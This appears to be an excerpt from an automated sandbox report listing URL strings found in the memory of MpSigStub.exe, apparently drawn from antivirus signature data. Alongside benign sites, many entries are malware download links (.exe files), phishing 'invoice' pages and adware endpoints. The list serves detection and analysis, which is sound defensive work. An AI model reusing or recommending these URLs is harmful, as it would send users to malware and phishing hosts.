    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://v.bddp.net
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://v.iask.com/v?tag=&k=%s
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://valentinadaddato.it//wp-includes/pomo/xcl/excelz/index.php
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://vaytiennhanhvungtau.com/.well-known/acme-challenge/gr.mpwq
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpString found in binary or memory: http://vbatools.pl/lista-aplikacji/
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://venus.ge/ds/1.gif
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://vequiato.sites.uol.com.br/
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://verred.net/?1309921
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://verticalagriculture.net/files/csrss.jar
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://vesterm.freehostia.com
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://vidalaviva.com/
    Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmpString found in binary or memory: http://vidareal2010.pisem.su/imglog.exe
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://video-song-player-install-now.com/
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://www.browserwise.com/d
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://www.busnuansa.my.id/pboojfzdzpub/8888888.png
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://www.cakedan.com/
    Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmpString found in binary or memory: http://www.calyeung.com/exec/wmapop.perl
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.cashon.co.kr/app/app.php?url=
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.cashon.co.kr/app/install.php?
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.cashon.co.kr/app/uninstall.php?
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.cashon.co.kr/search/search.php
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.cashon.co.kr/search/search.phpx
    Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmpString found in binary or memory: http://www.ccleaner.com
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpString found in binary or memory: http://www.ccnnic.com/download/
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://www.cepdep.org/csslb/graphics/outlines/registro-cita.php
    Source: MpSigStub.exe, 00000023.00000003.6282670643.0000028BD7070000.00000004.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpString found in binary or memory: http://www.certum.pl/CPS0
    Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.charlesboyer.it/invoice-for
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: http://www.chatzum.com/statistics/?affid=$RPT_AFFID&cztbid=$RPT_UID&inst=$RTP_SETINST&sethp=$RTP_SET
    Source: MpSigStub.exe, 00000023.00000003.6341852976.0000028BD6C90000.00000004.00000001.sdmpString found in binary or memory: http://www.cheathappens.com/trainer_troubleshooting_lite.asp
    Source: MpSigStub.exe, 00000023.00000003.6341852976.0000028BD6C90000.00000004.00000001.sdmpString found in binary or memory: http://www.cheathappens.com/unauthorized/
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://www.chmeditor.com/
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://www.cinderella-movie.com/regist1.php?s=2&d=14&f=01
    Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmpString found in binary or memory: http://www.ckplayer.comutf-8
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://www.cleveradds.com/
    Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: http://www.clubnoega.com/_notes/arquivo1.exe
    Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: http://www.clubnoega.com/_notes/arquivo2.exe
    Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: http://www.clubnoega.com/_notes/arquivo3.exe
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.cmbchina.com/
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.cmfu.com/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.cnn.com
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.coapr13south.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.coapr13south.com/download.php?xe
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://www.codylindley.com)
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.cojulyfastdl.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.cojulyfastdl.com/download.php?x
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.cojune13coast.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.comar13west.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.comay13north.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.comay15coat.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmpString found in binary or memory: http://www.comegoto.com/host.jpg
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://www.comeinbaby.com/app/app.php?sn=%s&pn=%s&mn=%s&pv=%s&appid=%s&os=macservice&pt=%s&msn=%
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpString found in binary or memory: http://www.comfm.com
    Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmpString found in binary or memory: http://www.comfm.comx;
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://www.commonname.com/find.asp?cn=
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://www.constructed.fi/
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: http://www.consumerinput.com/
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: http://www.consumerinput.com/xb
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://www.contacto1190.com.mx/css/aa/index.php?userid=admin.sharepoint
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.cooct13hen.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.cooctdlfast.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.cooctdlfast.com/download.php?x
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: http://www.copy9.com
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.cosept13jetty.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.cosept14water.com/download.php?
    Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmpString found in binary or memory: http://www.ctuser.net
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpString found in binary or memory: http://www.cultravel.it/invoice-number-
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://www.cxgr.com/codec/play/download/playmp3/
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://www.dandownload.com/
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.dangdang.com/
    Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmpString found in binary or memory: http://www.darxk.com/aviatic/systema.exe
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpString found in binary or memory: http://www.davion.plus.com/iscyqz.html
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.daybt.com/query.asp?q=%s
    Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmpString found in binary or memory: http://www.dealply.com/faq/
    Source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmpString found in binary or memory: http://www.default-search.net/search?sid=
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpString found in binary or memory: http://www.delta-homes.com/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.desh-datenservice.de/ups-view/
    Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmpString found in binary or memory: http://www.desktopsmiley.com/toolbar/desktopsmiley/download/
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://www.dhl.com/img/meta/dhl_logo.gif
    Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmpString found in binary or memory: http://www.dialerclub.com
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpString found in binary or memory: http://www.diannaowang.com:8080
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.dianping.com/
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://www.diaochapai.com/survey/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.digitrends.co.ke/invoice/
    Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmpString found in binary or memory: http://www.direct-ip.com/
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://www.distance24.org/route.json?stops=
    Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmpString found in binary or memory: http://www.djapp.info/?domain=xa
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://www.dk-soft.org
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://www.dnangels.net/q2q/qqlong.asp
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
    Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmpString found in binary or memory: http://www.dosearches.com/?utm_source=b&utm_medium=
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://www.doswf.com
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://www.down988.cn/2.htm?021width=0height=0
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.dsdsd.com/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.dutty.de/
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: http://www.e-jok.cn/cnfg/
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: http://www.e-jok.cn/cnfg/_poplkh
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: http://www.e-jok.cn/cnfg/canview.txt
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: http://www.e-jok.cn/cnfg/xh
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: http://www.e-jok.cn/count/updatedata.aspx?id=
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: http://www.e-mirrorsite.com/exit/movies1.html__
    Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmpString found in binary or memory: http://www.e-mirrorsite.com/exit/music
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpString found in binary or memory: http://www.easypoint.kr/cashback/config.php
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.php
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://www.easyspeedcheck.com/easyspeedcheck-1.phpx
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.ebay.com
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://www.efixpctools.com
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://www.egy8.com
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://www.egy8.comx
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://www.elec-tb.com/tmp
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.empressdynasty.com/invoice-number-51356/
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://www.enerjisampiyonaku.com/logs/form.php
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: http://www.eomniform.com/OF5/nsplugins/OFMailX.cab
    Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmpString found in binary or memory: http://www.epoolsoft.com/pchunter/x
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://www.epoolstroi.ru/templates/im-start/css/fonts/canada%20post%20notice%20card.zip
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://www.esaof.edu.pt/templates/beez/images_general/xml/xiqueyhayudhxzzc.exe
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://www.ewrtw.pw/c/niubilityc.exe
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://www.exit7.net/
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: http://www.eyuyan.com)
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpString found in binary or memory: http://www.f2ko.de
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: http://www.facebookikiziniz.com/ext/r.php
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.fakhfouri.com/sales-invoice/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.fastclick.com
    Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmpString found in binary or memory: http://www.fastmp3player.com
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://www.fastmp3player.com/affiliates/
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: http://www.fastmp3player.com/affiliates/772465/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://www.fb.beirutmarathonculture.org/aos/aos/aos/index.htm)
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://www.fbcom.review/d/10.doc
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://www.fbcom.review/d/9.doc
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: http://www.fbi.gov/index.htm
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://www.fenomen-games.com/dhome.htm
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://www.fenomen-games.com/dhome.htmxM
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txt
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpString found in binary or memory: http://www.fileden.com/files/2011/10/5/3204996/curver.txtxN
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://www.fixarabul.com
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://www.fixarasana.com
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.flashempire.com/
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpString found in binary or memory: http://www.flashkin.net
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpString found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://www.friend-card.com/pickup.aspx?code=
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://www.friend-greeting.net/pickup.aspx?code=
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://www.friendgreeting.com/pickup.aspx?code=
    Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmpString found in binary or memory: http://www.friskypotato.com/
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://www.g00gleadserver.com/list.txt
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://www.gamedanji.cn/ExeIni
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://www.general-insurance.net/wp-content/themes/general-ins-net/po
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://www.geocities.com/joke_haha2001
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://www.getip.pw
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://www.getpricefinder.com/
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.getsav-in.compublisheradpeak
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://www.gistery.trade/sys/designbolts.exe
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: http://www.gnu.org/licenses/
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://www.go2000.cn/p/?q=
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://www.go2000.com/?4
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://www.go2000.com/?4aM
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://www.goldwindos2000.com/hkeraone/hker.htmwidht=0height=0
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://www.goldwindos2000.com/krratwo/hker.htm
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmpString found in binary or memory: http://www.goodtimesplayer.com/license.cgi?vidlock_params=
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://www.google.cn/search?complete=1&hl=zh-CN&inlang=zh-CN&newwindow=1&q=
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.google.cn/search?q=%s
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com.br
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com.tr/
    Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
    Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
    Source: MpSigStub.exe, 00000023.00000003.6227003671.0000028BC70EC000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://www.googleledal.com/traff1/go.php?sid=1
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.gooo.ru
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://www.gorillawalker.com
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.gratisweb.com/vaisefuder00
    Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmpString found in binary or memory: http://www.sbcku.com/index.php
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://www.scan-dinavia-succession.com/kyqx7t6c/index.php
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
    Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://www.search-aid.com/search.php?qq=
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpString found in binary or memory: http://www.search-and-find.netg
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://www.search.ask.com
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://www.searchmaid.com/
    Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmpString found in binary or memory: http://www.searchult.com/?bd=sc&oem=
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://www.shadowmp3.com
